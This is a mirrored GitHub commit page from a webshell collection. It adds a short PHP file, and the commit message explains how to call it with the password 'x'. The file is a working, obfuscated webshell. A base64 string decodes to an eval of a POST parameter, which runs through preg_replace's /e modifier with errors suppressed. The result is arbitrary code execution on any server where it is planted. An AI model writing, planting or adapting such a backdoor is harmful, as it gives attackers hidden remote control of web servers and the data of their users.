1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00

Create w_2016-05-25.php

usage : shell.php?x=1 password "x"
or  shell.php  password "x"
This commit is contained in:
tennc
2016-05-25 10:06:56 +08:00
parent 5ce79c1ab2
commit b09d2eadcc

View File

@@ -0,0 +1,6 @@
<?php
@$a = $_POST['x'];
if(isset($a)){
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>